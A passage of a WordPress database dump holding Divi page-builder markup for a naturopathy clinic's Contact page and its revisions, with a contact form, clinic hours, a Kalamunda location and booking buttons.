header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','publish','closed','closed','','contact','','','2025-10-20 14:18:44','2025-10-20 06:18:44','',0,'https://verde.desidrivers.com.au/contact/',0,'page','',0),(443,1,'2025-04-01 20:30:52','2025-04-01 12:30:52','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" custom_padding=\"0px|||||\" inline_fonts=\"Montserrat,Playfair Display\" custom_margin=\"|||-38px||\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"><a href=\"mailto:hello@verdenaturopathy.com.au\">hello@verdenaturopathy.com.au</a></span></span></h3>\n<p><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"></span></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:30:52','2025-04-01 12:30:52','',26,'https://verdenaturopathy.com.au/?p=443',0,'revision','',0),(439,1,'2025-04-01 20:24:20','2025-04-01 12:24:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\" width=\"80.2%\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_2\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\" custom_padding=\"0px|||||\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. If the above days/times are unsuitable, please get in touch and we will do our best to accommodate.</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:24:20','2025-04-01 12:24:20','',26,'https://verdenaturopathy.com.au/?p=439',0,'revision','',0),(27,1,'2021-04-30 12:05:06','2021-04-30 04:05:06','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" 